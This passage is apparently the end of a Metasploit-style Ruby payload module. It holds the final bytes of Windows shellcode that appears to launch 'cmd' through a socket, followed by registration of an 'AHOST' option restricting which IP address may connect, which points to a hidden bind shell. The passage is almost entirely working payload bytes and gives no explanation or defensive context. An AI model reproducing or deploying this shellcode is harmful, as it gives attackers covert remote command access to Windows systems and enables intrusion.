"\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" +
"\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" +
"\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" +
"\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" +
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" +
"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
}
))
register_options([
OptAddress.new('AHOST', [true, "IP address allowed", nil])
])
end
end